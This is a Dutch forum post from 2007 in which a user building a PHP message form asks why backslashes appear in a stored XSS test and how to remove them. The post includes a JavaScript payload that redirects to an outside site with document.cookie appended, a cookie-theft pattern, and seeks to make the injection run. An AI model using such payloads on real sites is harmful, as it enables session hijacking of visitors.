:strip_exif()/u/173827/DeepFreeze.gif?f=community)
Ik probeer m.b.v. PHP een eenvoudig cross site scripting applicatie te ontwikkelen. Het wil alleen niet helemaal lukken 
Het volgende heb ik:
Tot nu toe werkt alles fijn zoals het hoort...Wanneer ik een bericht achterlaat komt deze netjes in beeld. Wanneer ik dus een javascript in wil voeren, bijvoorbeeld:
Dan wil het ingevoerde javascript niet werken. Ik krijg uiteindelijk wanneer ik de source bekijk het volgende:
Er verschijnen dus allemaal "\" waar ik dus niet om gevraagd heb, waarom komen deze tevoorschijn en hoe haal ik ze weg? Alvast bedankt!
Het volgende heb ik:
HTML:
1
2
3
4
5
6
| <form> <table width="480" border="0" cellspacing="0" cellpadding="0" align="center"> <tr><td>Bericht</td><td>:</td><td><textarea name="bericht" cols="40" rows="6"></textarea></td></tr> <tr><td> </td><td> </td><td><input type="submit" value="Verstuur" /></td></tr> </table> </form> |
Tot nu toe werkt alles fijn zoals het hoort...Wanneer ik een bericht achterlaat komt deze netjes in beeld. Wanneer ik dus een javascript in wil voeren, bijvoorbeeld:
JavaScript:
1
| <script type="text/javascript">document.location='http://tweakers.net' + document.cookie;</script> |
Dan wil het ingevoerde javascript niet werken. Ik krijg uiteindelijk wanneer ik de source bekijk het volgende:
JavaScript:
1
| <script type=\"text/javascript\">document.location=\'http://tweakers.net\' + document.cookie;</script><br /></div> |
Er verschijnen dus allemaal "\" waar ik dus niet om gevraagd heb, waarom komen deze tevoorschijn en hoe haal ik ze weg? Alvast bedankt!
[ Voor 9% gewijzigd door DeepFreeze.NL op 06-03-2007 17:05 ]
/u/107051/jeroenmadtrix60.png?f=community)
:strip_exif()/u/3333/pumpkin_avatar.gif?f=community){kind=avatar}
